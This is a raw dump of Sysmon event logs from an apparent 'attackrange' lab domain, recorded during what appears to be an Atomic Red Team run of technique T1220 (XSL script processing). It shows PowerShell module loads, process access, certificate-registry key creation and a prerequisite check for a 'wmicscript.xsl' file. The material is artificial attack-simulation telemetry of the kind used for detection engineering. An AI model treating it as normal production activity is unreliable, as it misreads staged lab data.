Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057347854Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.922{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057347853Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.922{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\atl.dll3.05.2284ATL Module for Windows XP (Unicode)Microsoft (R) Visual C++Microsoft CorporationATL.DLLMD5=C1B73181019C1E1F28F4161B5F198B7F,SHA256=C3678504437D23910C18D3680B05B4E819A2229BDD0E1E0567186C70D814560DtrueMicrosoft WindowsValid 734700x800000000000000057347852Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.922{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057347851Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.922{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057347850Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.922{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057347849Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.922{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057347848Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.922{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057347847Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.922{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057347846Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.922{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057347845Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.922{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057347844Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.922{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057347843Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.922{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 10341000x800000000000000057347842Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.922{8B6011A9-C6FA-616E-9B35-01000000F101}3006716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c01f5|UNKNOWN(00007FFCBCEFB383) 734700x800000000000000057347841Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.922{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436trueMicrosoft WindowsValid 10341000x800000000000000057347840Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.922{8B6011A9-888A-6164-7000-00000000F101}34483444C:\Windows\system32\csrss.exe{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057347839Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.922{8B6011A9-C6FA-616E-9B35-01000000F101}3006716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+257223a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+25720a1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+25fb1d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+256a327(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+303aba9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+252f8cf(wow64)|UNKNOWN(00007FFCBCFB2BBE) 154100x800000000000000057347838Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.897{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1220\src\wmicscript.xsl) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 534500x800000000000000057347837Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.722{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 11241100x800000000000000057347836Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.722{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive2021-09-16 13:08:16.573 23542300x800000000000000057347835Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.722{8B6011A9-5BA4-618E-52F3-04000000F101}2156ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CFfalsetrue 734700x800000000000000057347834Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\bcacaaa795f281ac827a1af051d3a051\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=DF0A266E1C073131336B9597E2543820,SHA256=F1079A19E1C6E19EB1A2BA701A3919A0A0474EDFA579D8F3EC05965ECDF5F6FDfalse-Unavailable 734700x800000000000000057347833Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll10.0.14393.2969Microsoft Windows PowerShell Management CommandsMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.PowerShell.Commands.Management.dllMD5=3A1B9D9F3D978CCBB25CE1A34A25AEF2,SHA256=67DC001FA5497A40FB991F39E8CD8DE2C061DC31A1532279D1C5C6F335D580D1false-Unavailable 12241200x800000000000000057347832Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057347831Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057347830Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057347829Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347828Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347827Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347826Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347825Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347824Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347823Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347822Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347821Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347820Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347819Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347818Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347817Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347816Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347815Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347814Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347813Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347812Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347811Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347810Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 23542300x800000000000000021219855Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:44.267{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3B6893EB0AEA81A80EE51B0DB5DEB3D,SHA256=1B27C40551E7EBCEBED4F82608EDBBE205B3B2457F945E7D964B00ACD4175FAE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 12241200x800000000000000057347809Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.591{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 11241100x800000000000000057347808Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.560{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\pstransactions\20211112\PowerShell_transcript.WIN-DC-469.ORHtVpKY.20211112121844.txt2021-11-12 12:18:44.560 10341000x800000000000000057347807Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.560{8B6011A9-886E-6164-1600-00000000F101}13166900C:\Windows\System32\svchost.exe{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057347806Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.560{8B6011A9-886E-6164-1600-00000000F101}13161348C:\Windows\System32\svchost.exe{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057347805Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.560{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValid 734700x800000000000000057347804Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.538{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\21ae9089eba57af8d90c2696ddf8620c\Microsoft.CSharp.ni.dll4.8.3761.0Microsoft.CSharp.dllMicrosoft® .NET FrameworkMicrosoft CorporationMicrosoft.CSharp.dllMD5=964847567F390EECD11E2314B6FE3CB1,SHA256=3897257C98046CE789A0520914D7012ECA59924FD67245095D2DB1A08E3B4A0Efalse-Unavailable 11241100x800000000000000057347803Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.522{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057347802Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.522{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7982C4EDEC74410CE8592B23857CAD47,SHA256=EF48538661B8D94A922BFC0AD263272E4F05598E57B170C5DF4D3D5FD31D7D65falsetrue 10341000x800000000000000057347801Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 